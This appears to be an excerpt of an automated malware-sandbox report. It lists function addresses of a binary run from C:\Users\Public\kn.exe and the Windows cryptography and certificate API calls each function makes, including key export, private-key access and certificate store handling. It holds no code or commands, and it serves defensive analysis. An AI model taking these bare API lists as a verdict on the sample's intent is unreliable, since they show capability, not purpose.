          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854167CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6854167CC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A27BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6854A27BC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549C7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF68549C7F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B07F4 BCryptDestroyKey,#205,#357,7_2_00007FF6854B07F4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685486280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF685486280
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D2278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,7_2_00007FF6854D2278
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E8298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,7_2_00007FF6854E8298
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DE274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF6854DE274
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685450300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,7_2_00007FF685450300
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68551A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,7_2_00007FF68551A2E0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685496194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF685496194
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF68547417C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D61AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,7_2_00007FF6854D61AC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854521A4 #360,#359,#357,#357,BCryptFreeBuffer,7_2_00007FF6854521A4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68551613C CryptDecodeObjectEx,7_2_00007FF68551613C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854AE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF6854AE1F8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854EA1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,7_2_00007FF6854EA1F8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685516214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,7_2_00007FF685516214
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549A1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,7_2_00007FF68549A1E8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A8488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,7_2_00007FF6854A8488
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548A450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,7_2_00007FF68548A450
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548C450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,7_2_00007FF68548C450
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,7_2_00007FF68543C514
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DE516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF6854DE516
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854824D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,7_2_00007FF6854824D4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854244E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6854244E0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543E3B0 #357,#357,CryptDecodeObject,LocalFree,7_2_00007FF68543E3B0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A6374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,7_2_00007FF6854A6374
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A2358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,7_2_00007FF6854A2358
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685434410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF685434410
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E8404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF6854E8404
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854523E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,7_2_00007FF6854523E8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DEE94 CryptSignMessage,SetLastError,7_2_00007FF6854DEE94
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685450E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,7_2_00007FF685450E94
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685482E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF685482E7C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6EA8 NCryptImportKey,#360,7_2_00007FF6854E6EA8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6E48 NCryptSetProperty,#360,7_2_00007FF6854E6E48
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B2E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,7_2_00007FF6854B2E6C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F4E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,7_2_00007FF6854F4E58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6F2C NCryptExportKey,#360,7_2_00007FF6854E6F2C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685448F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,7_2_00007FF685448F1C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF6854B0EF4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685510ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,7_2_00007FF685510ED0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0D84 NCryptFreeObject,#205,#357,7_2_00007FF6854B0D84
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B2D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF6854B2D78
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6D78 NCryptOpenKey,#360,7_2_00007FF6854E6D78
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E2DAC #357,#357,CryptFindOIDInfo,LocalFree,7_2_00007FF6854E2DAC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685440E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF685440E24
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0DD4 NCryptGetProperty,#205,#359,#357,#359,#357,7_2_00007FF6854B0DD4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D8DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,7_2_00007FF6854D8DD0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685500DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,7_2_00007FF685500DB8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6DE0 NCryptCreatePersistedKey,#360,7_2_00007FF6854E6DE0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685494DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF685494DDC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68545107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,7_2_00007FF68545107C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854BB0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854BB0A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547B098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,7_2_00007FF68547B098
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B1058 NCryptOpenStorageProvider,#205,#359,#357,7_2_00007FF6854B1058
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E705C BCryptGetProperty,#360,7_2_00007FF6854E705C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685469134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,7_2_00007FF685469134
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E7124 BCryptGenerateKeyPair,#360,7_2_00007FF6854E7124
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF6854D511C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E70C8 BCryptSetProperty,#360,7_2_00007FF6854E70C8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B10D8 NCryptSetProperty,#205,#359,#357,#359,#357,7_2_00007FF6854B10D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B30D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF6854B30D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685444F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,7_2_00007FF685444F90
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0FB4 NCryptOpenKey,#205,#359,#357,#357,7_2_00007FF6854B0FB4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6FAC BCryptOpenAlgorithmProvider,#360,7_2_00007FF6854E6FAC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685494F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF685494F50
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DEF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,7_2_00007FF6854DEF74
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF6854A0F58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E700C BCryptEnumAlgorithms,#360,7_2_00007FF6854E700C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68542302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF68542302F
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A9028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,7_2_00007FF6854A9028
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685427034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,7_2_00007FF685427034
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B7020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854B7020
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6854B301C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E2A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,7_2_00007FF6854E2A78
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685426A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,7_2_00007FF685426A84
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF68549EA7C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B8AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854B8AA0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A8AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF6854A8AFC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685452B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,7_2_00007FF685452B00
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0ABC BCryptVerifySignature,#205,#357,#357,#357,#357,7_2_00007FF6854B0ABC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B2AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,7_2_00007FF6854B2AE4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E2994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF6854E2994
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B099C BCryptOpenAlgorithmProvider,#205,#359,#359,7_2_00007FF6854B099C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854729A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF6854729A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B8940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,7_2_00007FF6854B8940
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854BC940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF6854BC940
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF68543C960
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549AA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,7_2_00007FF68549AA00
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685494A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,7_2_00007FF685494A34
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0A18 BCryptSetProperty,#205,#359,#357,#357,7_2_00007FF6854B0A18
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B4A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,7_2_00007FF6854B4A1C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854EA9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF6854EA9F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547E9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,7_2_00007FF68547E9F0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6C88 NCryptEnumAlgorithms,#360,7_2_00007FF6854E6C88
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B2C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,7_2_00007FF6854B2C80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F4C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,7_2_00007FF6854F4C80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854BACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,7_2_00007FF6854BACAC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A4CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6854A4CA0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685416C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF685416C4C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0C3C NCryptExportKey,#205,#359,#359,#357,7_2_00007FF6854B0C3C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E8C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF6854E8C58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0D14 NCryptFinalizeKey,#205,#357,#357,7_2_00007FF6854B0D14
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A2CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,7_2_00007FF6854A2CF8
